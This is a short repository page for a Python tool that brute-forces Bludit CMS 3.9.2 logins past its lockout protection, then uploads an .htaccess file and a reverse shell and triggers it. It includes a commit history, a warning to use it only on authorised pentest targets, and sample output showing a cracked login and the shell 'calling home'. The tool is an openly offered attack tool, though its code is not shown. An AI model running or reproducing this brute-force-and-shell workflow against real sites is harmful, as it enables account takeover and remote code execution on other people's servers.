~nighthawk/bludit-3.9.2-brute-exploit

bludit 3.9.2 bruteforce bypasser and reverse shell uploader
33ec4fac — Frank Brodbeck 3 months ago
script will now bruteforce and exploit bludit for uploading a reverse shell and trigger it
1986c7d3 — Musyoka Ian 4 months ago
Create bruteforce.py
02dd533a — Musyoka Ian 4 months ago
Initial commit

Modified version of https://github.com/musyoka101/Bludit-CMS-Version-3.9.2-Brute-Force-Protection-Bypass-script

DO NOT USE THIS ON ENVIRONMENTS YOU ARE NOT ALLOWED TO PENTEST

The script takes new parameters:

  • a list of usernames to bruteforce
  • a shell to upload

nighthawk@attacker:~$ ./bruteforce.py

[*] Attacking bludit @ http://198.51.100.1
[+] Starting bruteforce
[-] Trying: RolandDeschain
[-] SUCCESS: johndoe with password s3cr3t
[+] Starting exploitation
[-] Uploading .htaccess
[-] Dropping shell
[-] Calling home
[!] Thank you for flying with nighthawk.